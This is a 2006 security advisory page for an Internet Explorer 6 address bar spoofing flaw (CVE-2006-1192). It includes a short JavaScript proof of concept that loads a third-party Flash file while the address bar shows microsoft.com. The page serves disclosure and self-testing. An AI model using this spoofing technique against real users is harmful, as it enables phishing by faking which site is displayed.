Register | Forget Password | Login
Search :
SecurityReason

News

Search

SecurityAlert

About SecurityAlert

ExploitAlert

SecurityReason Research

WLB

WLB Database

Send to WLB

About WLB

RSS

News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Corporate

Contact

About us

Services

SecurePHP

Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Details : SecurityAlert

  Topic : Another Internet Explorer Address Bar Spoofing Vulnerability
  SecurityAlert : 670
  CVE : CVE-2006-1192
  SecurityRisk : Low  alert  (About)
  Remote Exploit : No
  Local Exploit : No
  Exploit Given : Yes
  Credit : hainamluke yahoo com
  Published : 03.04.2006

  Affected Software : Internet Explorer



  Advisory Text :  

DESCRIPTION:

I've found another Internet Explorer Address Bar Spoofing Vulnerability
that can be exploited by phiser. This allow attacker inject a malcious
shockwave-flash application into Internet Explorer while it is display
another URL (even trusted sites).

If you are loading a shockwave-flash but it isn't loaded fully, you make
change to the window.location, both of two resouces will be loaded at the
same time and the Addess Bar display the new window.location. And when the
old shockwave are loaded fully, this will activate the IE but the Address
Bar isn't affected.

The vulnerability has been confirmed on a fully patched system with
Internet Explorer 6.0 + Microsoft Windows XP SP2 and previous versions. You
may perform the test by yourself with my simple code.

SAMPLE CODE:

##### LukesTest.htm #####
<script language="javascript">
function pause(ms)
{
date = new Date();
var curDate = null;

do { var curDate = new Date(); }
while(curDate-date < ms);
}

function spoof () {
win = window.open('http://www.microsoft.com/','new')
pause (2000)
win = window.open('http://www.buctuong.com/swfs/index.swf','new')
pause (2000)
win = window.open('http://www.microsoft.com/','new')

}
</script>
<a href="javascript: spoof()">Perform the test</a>
#########################

If you are vulnerable you will see the flash intro of buctuong.com while
the address bar is http://www.microsoft.com/
If you have a very fast connection you may change my flash application to a
larger one to make loading time take longer.

DISCOVERED BY:

Hai Nam Luke <hainamluke (at) yahoo (dot) com [email concealed]>
K46A - NEU, Hanoi




  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

*BSD libc (strfmon) Multiple vulnerabilities

high- 2008-03-25

Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems.

Apache rss

» Apache Tomcat information
   disclosure

» Apache Tomcat <=
   6.0.18 UTF8 Directory
   Traversal Vulnerability

» Apache Tomcat information
   disclosure vulnerability

» Apache Tomcat XSS
   vulnerability

PHP rss

» PHP 5.2.6 (error_log)
   safe_mode bypass

» PHP 5.2.6 chdir(),ftok()
   (standard ext) safe_mode
   bypass

» PHP 5.2.6 posix_access()
   (posix ext) safe_mode
   bypass

» PHP 5.2.5 and prior :
   *printf() functions
   Integer Overflow

Copyright © SecurityReason. All Rights Reserved.